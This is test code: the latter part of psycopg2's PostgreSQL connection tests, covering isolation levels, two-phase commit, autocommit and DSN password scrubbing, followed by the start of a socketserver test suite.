cur1.execute("insert into isolevel values (20);")
cur2.execute("select count(*) from isolevel;")
self.assertEqual(1, cur2.fetchone()[0])
cnn1.commit()
cur2.execute("select count(*) from isolevel;")
self.assertEqual(1, cur2.fetchone()[0])
cur1.execute("select count(*) from isolevel;")
self.assertEqual(1, cur1.fetchone()[0])
cnn2.commit()
cur1.execute("select count(*) from isolevel;")
self.assertEqual(2, cur1.fetchone()[0])
cur2.execute("select count(*) from isolevel;")
self.assertEqual(2, cur2.fetchone()[0])
def test_isolation_level_closed(self):
cnn = self.connect()
cnn.close()
self.assertRaises(psycopg2.InterfaceError, cnn.set_isolation_level, 0)
self.assertRaises(psycopg2.InterfaceError, cnn.set_isolation_level, 1)
def test_setattr_isolation_level_int(self):
cur = self.conn.cursor()
self.conn.isolation_level = ext.ISOLATION_LEVEL_SERIALIZABLE
self.assertEqual(self.conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.isolation_level = ext.ISOLATION_LEVEL_REPEATABLE_READ
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_REPEATABLE_READ
)
self.assertEqual(cur.fetchone()[0], "repeatable read")
else:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE
)
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.isolation_level = ext.ISOLATION_LEVEL_READ_COMMITTED
self.assertEqual(self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_COMMITTED)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.conn.isolation_level = ext.ISOLATION_LEVEL_READ_UNCOMMITTED
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_UNCOMMITTED
)
self.assertEqual(cur.fetchone()[0], "read uncommitted")
else:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_COMMITTED
)
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.assertEqual(ext.ISOLATION_LEVEL_DEFAULT, None)
self.conn.isolation_level = ext.ISOLATION_LEVEL_DEFAULT
self.assertEqual(self.conn.isolation_level, None)
cur.execute("SHOW transaction_isolation;")
isol = cur.fetchone()[0]
cur.execute("SHOW default_transaction_isolation;")
self.assertEqual(cur.fetchone()[0], isol)
def test_setattr_isolation_level_str(self):
cur = self.conn.cursor()
self.conn.isolation_level = "serializable"
self.assertEqual(self.conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.isolation_level = "repeatable read"
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_REPEATABLE_READ
)
self.assertEqual(cur.fetchone()[0], "repeatable read")
else:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE
)
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.isolation_level = "read committed"
self.assertEqual(self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_COMMITTED)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.conn.isolation_level = "read uncommitted"
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_UNCOMMITTED
)
self.assertEqual(cur.fetchone()[0], "read uncommitted")
else:
self.assertEqual(
self.conn.isolation_level, ext.ISOLATION_LEVEL_READ_COMMITTED
)
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.conn.isolation_level = "default"
self.assertEqual(self.conn.isolation_level, None)
cur.execute("SHOW transaction_isolation;")
isol = cur.fetchone()[0]
cur.execute("SHOW default_transaction_isolation;")
self.assertEqual(cur.fetchone()[0], isol)
def test_setattr_isolation_level_invalid(self):
self.assertRaises(ValueError, setattr, self.conn, "isolation_level", 0)
self.assertRaises(ValueError, setattr, self.conn, "isolation_level", -1)
self.assertRaises(ValueError, setattr, self.conn, "isolation_level", 5)
self.assertRaises(ValueError, setattr, self.conn, "isolation_level", "bah")
def test_attribs_segfault(self):
# bug #790
for i in range(10000):
self.conn.autocommit
self.conn.readonly
self.conn.deferrable
self.conn.isolation_level
class ConnectionTwoPhaseTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
self.make_test_table()
self.clear_test_xacts()
def tearDown(self):
self.clear_test_xacts()
ConnectingTestCase.tearDown(self)
def clear_test_xacts(self):
"""Rollback all the prepared transaction in the testing db."""
cnn = self.connect()
cnn.set_isolation_level(0)
cur = cnn.cursor()
try:
cur.execute(
"select gid from pg_prepared_xacts where database = %s", (dbname,)
)
except psycopg2.ProgrammingError:
cnn.rollback()
cnn.close()
return
gids = [r[0] for r in cur]
for gid in gids:
cur.execute("rollback prepared %s;", (gid,))
cnn.close()
def make_test_table(self):
cnn = self.connect()
cur = cnn.cursor()
try:
cur.execute("DROP TABLE test_tpc;")
except psycopg2.ProgrammingError:
cnn.rollback()
cur.execute("CREATE TABLE test_tpc (data text);")
cnn.commit()
cnn.close()
def count_xacts(self):
"""Return the number of prepared xacts currently in the test db."""
cnn = self.connect()
cur = cnn.cursor()
cur.execute(
"""
select count(*) from pg_prepared_xacts
where database = %s;""",
(dbname,),
)
rv = cur.fetchone()[0]
cnn.close()
return rv
def count_test_records(self):
"""Return the number of records in the test table."""
cnn = self.connect()
cur = cnn.cursor()
cur.execute("select count(*) from test_tpc;")
rv = cur.fetchone()[0]
cnn.close()
return rv
def test_tpc_commit(self):
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_commit');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_prepare()
self.assertEqual(cnn.status, ext.STATUS_PREPARED)
self.assertEqual(1, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_commit()
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(1, self.count_test_records())
def test_tpc_commit_one_phase(self):
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_commit_1p');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_commit()
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(1, self.count_test_records())
def test_tpc_commit_recovered(self):
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_commit_rec');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_prepare()
cnn.close()
self.assertEqual(1, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
cnn.tpc_commit(xid)
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(1, self.count_test_records())
def test_tpc_rollback(self):
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_rollback');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_prepare()
self.assertEqual(cnn.status, ext.STATUS_PREPARED)
self.assertEqual(1, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_rollback()
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
def test_tpc_rollback_one_phase(self):
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_rollback_1p');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_rollback()
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
def test_tpc_rollback_recovered(self):
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
self.assertEqual(cnn.status, ext.STATUS_READY)
cnn.tpc_begin(xid)
self.assertEqual(cnn.status, ext.STATUS_BEGIN)
cur = cnn.cursor()
cur.execute("insert into test_tpc values ('test_tpc_commit_rec');")
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn.tpc_prepare()
cnn.close()
self.assertEqual(1, self.count_xacts())
self.assertEqual(0, self.count_test_records())
cnn = self.connect()
xid = cnn.xid(1, "gtrid", "bqual")
cnn.tpc_rollback(xid)
self.assertEqual(cnn.status, ext.STATUS_READY)
self.assertEqual(0, self.count_xacts())
self.assertEqual(0, self.count_test_records())
def test_status_after_recover(self):
cnn = self.connect()
self.assertEqual(ext.STATUS_READY, cnn.status)
cnn.tpc_recover()
self.assertEqual(ext.STATUS_READY, cnn.status)
cur = cnn.cursor()
cur.execute("select 1")
self.assertEqual(ext.STATUS_BEGIN, cnn.status)
cnn.tpc_recover()
self.assertEqual(ext.STATUS_BEGIN, cnn.status)
def test_recovered_xids(self):
# insert a few test xns
cnn = self.connect()
cnn.set_isolation_level(0)
cur = cnn.cursor()
cur.execute("begin; prepare transaction '1-foo';")
cur.execute("begin; prepare transaction '2-bar';")
# read the values to return
cur.execute(
"""
select gid, prepared, owner, database
from pg_prepared_xacts
where database = %s;""",
(dbname,),
)
okvals = cur.fetchall()
okvals.sort()
cnn = self.connect()
xids = cnn.tpc_recover()
xids = [xid for xid in xids if xid.database == dbname]
xids.sort(key=attrgetter("gtrid"))
# check the values returned
self.assertEqual(len(okvals), len(xids))
for (xid, (gid, prepared, owner, database)) in zip(xids, okvals):
self.assertEqual(xid.gtrid, gid)
self.assertEqual(xid.prepared, prepared)
self.assertEqual(xid.owner, owner)
self.assertEqual(xid.database, database)
def test_xid_encoding(self):
cnn = self.connect()
xid = cnn.xid(42, "gtrid", "bqual")
cnn.tpc_begin(xid)
cnn.tpc_prepare()
cnn = self.connect()
cur = cnn.cursor()
cur.execute("select gid from pg_prepared_xacts where database = %s;", (dbname,))
self.assertEqual("42_Z3RyaWQ=_YnF1YWw=", cur.fetchone()[0])
@slow
def test_xid_roundtrip(self):
for fid, gtrid, bqual in [
(0, "", ""),
(42, "gtrid", "bqual"),
(0x7fffffff, "x" * 64, "y" * 64),
]:
cnn = self.connect()
xid = cnn.xid(fid, gtrid, bqual)
cnn.tpc_begin(xid)
cnn.tpc_prepare()
cnn.close()
cnn = self.connect()
xids = [x for x in cnn.tpc_recover() if x.database == dbname]
self.assertEqual(1, len(xids))
xid = xids[0]
self.assertEqual(xid.format_id, fid)
self.assertEqual(xid.gtrid, gtrid)
self.assertEqual(xid.bqual, bqual)
cnn.tpc_rollback(xid)
@slow
def test_unparsed_roundtrip(self):
for tid in [
"",
"hello, world!",
"x" * 199, # PostgreSQL's limit in transaction id length
]:
cnn = self.connect()
cnn.tpc_begin(tid)
cnn.tpc_prepare()
cnn.close()
cnn = self.connect()
xids = [x for x in cnn.tpc_recover() if x.database == dbname]
self.assertEqual(1, len(xids))
xid = xids[0]
self.assertEqual(xid.format_id, None)
self.assertEqual(xid.gtrid, tid)
self.assertEqual(xid.bqual, None)
cnn.tpc_rollback(xid)
def test_xid_construction(self):
from psycopg2.extensions import Xid
x1 = Xid(74, "foo", "bar")
self.assertEqual(74, x1.format_id)
self.assertEqual("foo", x1.gtrid)
self.assertEqual("bar", x1.bqual)
def test_xid_from_string(self):
from psycopg2.extensions import Xid
x2 = Xid.from_string("42_Z3RyaWQ=_YnF1YWw=")
self.assertEqual(42, x2.format_id)
self.assertEqual("gtrid", x2.gtrid)
self.assertEqual("bqual", x2.bqual)
x3 = Xid.from_string("99_xxx_yyy")
self.assertEqual(None, x3.format_id)
self.assertEqual("99_xxx_yyy", x3.gtrid)
self.assertEqual(None, x3.bqual)
def test_xid_to_string(self):
from psycopg2.extensions import Xid
x1 = Xid.from_string("42_Z3RyaWQ=_YnF1YWw=")
self.assertEqual(str(x1), "42_Z3RyaWQ=_YnF1YWw=")
x2 = Xid.from_string("99_xxx_yyy")
self.assertEqual(str(x2), "99_xxx_yyy")
def test_xid_unicode(self):
cnn = self.connect()
x1 = cnn.xid(10, "uni", "code")
cnn.tpc_begin(x1)
cnn.tpc_prepare()
cnn.reset()
xid = [x for x in cnn.tpc_recover() if x.database == dbname][0]
self.assertEqual(10, xid.format_id)
self.assertEqual("uni", xid.gtrid)
self.assertEqual("code", xid.bqual)
def test_xid_unicode_unparsed(self):
# We don't expect people shooting snowmen as transaction ids,
# so if something explodes in an encode error I don't mind.
# Let's just check uniconde is accepted as type.
cnn = self.connect()
cnn.set_client_encoding("utf8")
cnn.tpc_begin("transaction-id")
cnn.tpc_prepare()
cnn.reset()
xid = [x for x in cnn.tpc_recover() if x.database == dbname][0]
self.assertEqual(None, xid.format_id)
self.assertEqual("transaction-id", xid.gtrid)
self.assertEqual(None, xid.bqual)
def test_cancel_fails_prepared(self):
cnn = self.connect()
cnn.tpc_begin("cancel")
cnn.tpc_prepare()
self.assertRaises(psycopg2.ProgrammingError, cnn.cancel)
def test_tpc_recover_non_dbapi_connection(self):
from psycopg2.extras import RealDictConnection
cnn = self.connect(connection_factory=RealDictConnection)
cnn.tpc_begin("dict-connection")
cnn.tpc_prepare()
cnn.reset()
xids = cnn.tpc_recover()
xid = [x for x in xids if x.database == dbname][0]
self.assertEqual(None, xid.format_id)
self.assertEqual("dict-connection", xid.gtrid)
self.assertEqual(None, xid.bqual)
decorate_all_tests(ConnectionTwoPhaseTests, skip_if_tpc_disabled)
class TransactionControlTests(ConnectingTestCase):
def test_closed(self):
self.conn.close()
self.assertRaises(
psycopg2.InterfaceError,
self.conn.set_session,
ext.ISOLATION_LEVEL_SERIALIZABLE,
)
def test_not_in_transaction(self):
cur = self.conn.cursor()
cur.execute("select 1")
self.assertRaises(
psycopg2.ProgrammingError,
self.conn.set_session,
ext.ISOLATION_LEVEL_SERIALIZABLE,
)
def test_set_isolation_level(self):
cur = self.conn.cursor()
self.conn.set_session(ext.ISOLATION_LEVEL_SERIALIZABLE)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.set_session(ext.ISOLATION_LEVEL_REPEATABLE_READ)
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(cur.fetchone()[0], "repeatable read")
else:
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.set_session(isolation_level=ext.ISOLATION_LEVEL_READ_COMMITTED)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.conn.set_session(isolation_level=ext.ISOLATION_LEVEL_READ_UNCOMMITTED)
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(cur.fetchone()[0], "read uncommitted")
else:
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
def test_set_isolation_level_str(self):
cur = self.conn.cursor()
self.conn.set_session("serializable")
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.set_session("repeatable read")
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(cur.fetchone()[0], "repeatable read")
else:
self.assertEqual(cur.fetchone()[0], "serializable")
self.conn.rollback()
self.conn.set_session("read committed")
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
self.conn.set_session("read uncommitted")
cur.execute("SHOW transaction_isolation;")
if self.conn.server_version > 80000:
self.assertEqual(cur.fetchone()[0], "read uncommitted")
else:
self.assertEqual(cur.fetchone()[0], "read committed")
self.conn.rollback()
def test_bad_isolation_level(self):
self.assertRaises(ValueError, self.conn.set_session, 0)
self.assertRaises(ValueError, self.conn.set_session, 5)
self.assertRaises(ValueError, self.conn.set_session, "whatever")
def test_set_read_only(self):
self.assertTrue(self.conn.readonly is None)
cur = self.conn.cursor()
self.conn.set_session(readonly=True)
self.assertTrue(self.conn.readonly is True)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
self.conn.set_session(readonly=False)
self.assertTrue(self.conn.readonly is False)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "off")
self.conn.rollback()
def test_setattr_read_only(self):
cur = self.conn.cursor()
self.conn.readonly = True
self.assertTrue(self.conn.readonly is True)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
self.assertRaises(
self.conn.ProgrammingError, setattr, self.conn, "readonly", False
)
self.assertTrue(self.conn.readonly is True)
self.conn.rollback()
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
cur = self.conn.cursor()
self.conn.readonly = None
self.assertTrue(self.conn.readonly is None)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "off") # assume defined by server
self.conn.rollback()
self.conn.readonly = False
self.assertTrue(self.conn.readonly is False)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "off")
self.conn.rollback()
def test_set_default(self):
cur = self.conn.cursor()
cur.execute("SHOW transaction_isolation;")
isolevel = cur.fetchone()[0]
cur.execute("SHOW transaction_read_only;")
readonly = cur.fetchone()[0]
self.conn.rollback()
self.conn.set_session(isolation_level="serializable", readonly=True)
self.conn.set_session(isolation_level="default", readonly="default")
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], isolevel)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], readonly)
@skip_before_postgres(9, 1)
def test_set_deferrable(self):
self.assertTrue(self.conn.deferrable is None)
cur = self.conn.cursor()
self.conn.set_session(readonly=True, deferrable=True)
self.assertTrue(self.conn.deferrable is True)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
self.conn.set_session(deferrable=False)
self.assertTrue(self.conn.deferrable is False)
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "off")
self.conn.rollback()
@skip_after_postgres(9, 1)
def test_set_deferrable_error(self):
self.assertRaises(
psycopg2.ProgrammingError,
self.conn.set_session,
readonly=True,
deferrable=True,
)
self.assertRaises(
psycopg2.ProgrammingError, setattr, self.conn, "deferrable", True
)
@skip_before_postgres(9, 1)
def test_setattr_deferrable(self):
cur = self.conn.cursor()
self.conn.deferrable = True
self.assertTrue(self.conn.deferrable is True)
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "on")
self.assertRaises(
self.conn.ProgrammingError, setattr, self.conn, "deferrable", False
)
self.assertTrue(self.conn.deferrable is True)
self.conn.rollback()
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.rollback()
cur = self.conn.cursor()
self.conn.deferrable = None
self.assertTrue(self.conn.deferrable is None)
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "off") # assume defined by server
self.conn.rollback()
self.conn.deferrable = False
self.assertTrue(self.conn.deferrable is False)
cur.execute("SHOW transaction_deferrable;")
self.assertEqual(cur.fetchone()[0], "off")
self.conn.rollback()
def test_mixing_session_attribs(self):
cur = self.conn.cursor()
self.conn.autocommit = True
self.conn.readonly = True
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
cur.execute("SHOW default_transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
self.conn.autocommit = False
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
cur.execute("SHOW default_transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "off")
def test_idempotence_check(self):
self.conn.autocommit = False
self.conn.readonly = True
self.conn.autocommit = True
self.conn.readonly = True
cur = self.conn.cursor()
cur.execute("SHOW transaction_read_only")
self.assertEqual(cur.fetchone()[0], "on")
class AutocommitTests(ConnectingTestCase):
def test_closed(self):
self.conn.close()
self.assertRaises(
psycopg2.InterfaceError, setattr, self.conn, "autocommit", True
)
# The getter doesn't have a guard. We may change this in future
# to make it consistent with other methods; meanwhile let's just check
# it doesn't explode.
try:
self.assertTrue(self.conn.autocommit in (True, False))
except psycopg2.InterfaceError:
pass
def test_default_no_autocommit(self):
self.assertTrue(not self.conn.autocommit)
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur = self.conn.cursor()
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_BEGIN)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_INTRANS
)
self.conn.rollback()
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
def test_set_autocommit(self):
self.conn.autocommit = True
self.assertTrue(self.conn.autocommit)
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur = self.conn.cursor()
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
self.conn.autocommit = False
self.assertTrue(not self.conn.autocommit)
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_BEGIN)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_INTRANS
)
def test_set_intrans_error(self):
cur = self.conn.cursor()
cur.execute("select 1;")
self.assertRaises(
psycopg2.ProgrammingError, setattr, self.conn, "autocommit", True
)
def test_set_session_autocommit(self):
self.conn.set_session(autocommit=True)
self.assertTrue(self.conn.autocommit)
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur = self.conn.cursor()
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
self.conn.set_session(autocommit=False)
self.assertTrue(not self.conn.autocommit)
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_BEGIN)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_INTRANS
)
self.conn.rollback()
self.conn.set_session("serializable", readonly=True, autocommit=True)
self.assertTrue(self.conn.autocommit)
cur.execute("select 1;")
self.assertEqual(self.conn.status, ext.STATUS_READY)
self.assertEqual(
self.conn.get_transaction_status(), ext.TRANSACTION_STATUS_IDLE
)
cur.execute("SHOW transaction_isolation;")
self.assertEqual(cur.fetchone()[0], "serializable")
cur.execute("SHOW transaction_read_only;")
self.assertEqual(cur.fetchone()[0], "on")
class PasswordLeakTestCase(ConnectingTestCase):
def setUp(self):
super(PasswordLeakTestCase, self).setUp()
PasswordLeakTestCase.dsn = None
class GrassingConnection(ext.connection):
"""A connection snitching the dsn away.
This connection passes the dsn to the test case class even if init
fails (e.g. connection error). Test that we mangle the dsn ok anyway.
"""
def __init__(self, *args, **kwargs):
try:
super(PasswordLeakTestCase.GrassingConnection, self).__init__(
*args, **kwargs
)
finally:
# The connection is not initialized entirely, however the C
# code should have set the dsn, and it should have scrubbed
# the password away
PasswordLeakTestCase.dsn = self.dsn
def test_leak(self):
self.assertRaises(
psycopg2.DatabaseError,
self.GrassingConnection,
"dbname=nosuch password=whateva",
)
self.assertDsnEqual(self.dsn, "dbname=nosuch password=xxx")
@skip_before_libpq(9, 2)
def test_url_leak(self):
self.assertRaises(
psycopg2.DatabaseError,
self.GrassingConnection,
"postgres://someone:whateva@localhost/nosuch",
)
self.assertDsnEqual(
self.dsn, "user=someone password=xxx host=localhost dbname=nosuch"
)
class SignalTestCase(ConnectingTestCase):
@slow
@skip_before_postgres(8, 2)
def test_bug_551_returning(self):
# Raise an exception trying to decode 'id'
self._test_bug_551(
query="""
INSERT INTO test551 (num) VALUES (%s) RETURNING id
"""
)
@slow
def test_bug_551_no_returning(self):
# Raise an exception trying to decode 'INSERT 0 1'
self._test_bug_551(
query="""
INSERT INTO test551 (num) VALUES (%s)
"""
)
def _test_bug_551(self, query):
script = """\
import os
import sys
import time
import signal
import warnings
import threading
# ignore wheel deprecation warning
with warnings.catch_warnings():
warnings.simplefilter('ignore')
import psycopg2
def handle_sigabort(sig, frame):
sys.exit(1)
def killer():
time.sleep(0.5)
os.kill(os.getpid(), signal.SIGABRT)
signal.signal(signal.SIGABRT, handle_sigabort)
conn = psycopg2.connect(%(dsn)r)
cur = conn.cursor()
cur.execute("create table test551 (id serial, num varchar(50))")
t = threading.Thread(target=killer)
t.daemon = True
t.start()
while True:
cur.execute(%(query)r, ("Hello, world!",))
""" % {
"dsn": dsn,
"query": query,
}
proc = sp.Popen(
[sys.executable, "-c", script_to_py3(script)],
stdout=sp.PIPE,
stderr=sp.PIPE,
)
(out, err) = proc.communicate()
self.assertNotEqual(proc.returncode, 0)
# Strip [NNN refs] from output
err = re.sub(br"\[[^\]]+\]", b"", err).strip()
self.assertTrue(not err, err)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
test_socketserver.py
|
"""
Test suite for socketserver.
"""
import contextlib
import io
import os
import select
import signal
import socket
import tempfile
import unittest
import socketserver
import test.support
from test.support import reap_children, reap_threads, verbose
try:
import threading
except ImportError:
threading = None
test.support.requires("network")
TEST_STR = b"hello world\n"
HOST = test.support.HOST
HAVE_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
requires_unix_sockets = unittest.skipUnless(HAVE_UNIX_SOCKETS,
'requires Unix sockets')
HAVE_FORKING = hasattr(os, "fork")
requires_forking = unittest.skipUnless(HAVE_FORKING, 'requires forking')
def signal_alarm(n):
"""Call signal.alarm when it exists (i.e. not on Windows)."""
if hasattr(signal, 'alarm'):
signal.alarm(n)
# Remember real select() to avoid interferences with mocking
_real_select = select.select
def receive(sock, n, timeout=20):
r, w, x = _real_select([sock], [], [], timeout)
if sock in r:
return sock.recv(n)
else:
raise RuntimeError("timed out on %r" % (sock,))
if HAVE_UNIX_SOCKETS and HAVE_FORKING:
class ForkingUnixStreamServer(socketserver.ForkingMixIn,
socketserver.UnixStreamServer):
pass
class ForkingUnixDatagramServer(socketserver.ForkingMixIn,
socketserver.UnixDatagramServer):
pass
@contextlib.contextmanager
def simple_subprocess(testcase):
"""Tests that a custom child process is not waited on (Issue 1540386)"""
pid = os.fork()
if pid == 0:
# Don't raise an exception; it would be caught by the test harness.
os._exit(72)
yield None
pid2, status = os.waitpid(pid, 0)
testcase.assertEqual(pid2, pid)
testcase.assertEqual(72 << 8, status)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketServerTest(unittest.TestCase):
"""Test all socket servers."""
def setUp(self):
signal_alarm(60) # Kill deadlocks after 60 seconds.
self.port_seed = 0
self.test_files = []
def tearDown(self):
signal_alarm(0) # Didn't deadlock.
reap_children()
for fn in self.test_files:
try:
os.remove(fn)
except OSError:
pass
self.test_files[:] = []
def pickaddr(self, proto):
if proto == socket.AF_INET:
return (HOST, 0)
else:
# XXX: We need a way to tell AF_UNIX to pick its own name
# like AF_INET provides port==0.
dir = None
fn = tempfile.mktemp(prefix='unix_socket.', dir=dir)
self.test_files.append(fn)
return fn
def make_server(self, addr, svrcls, hdlrbase):
class MyServer(svrcls):
def handle_error(self, request, client_address):
self.close_request(request)
raise
class MyHandler(hdlrbase):
def handle(self):
line = self.rfile.readline()
self.wfile.write(line)
if verbose: print("creating server")
server = MyServer(addr, MyHandler)
self.assertEqual(server.server_address, server.socket.getsockname())
return server
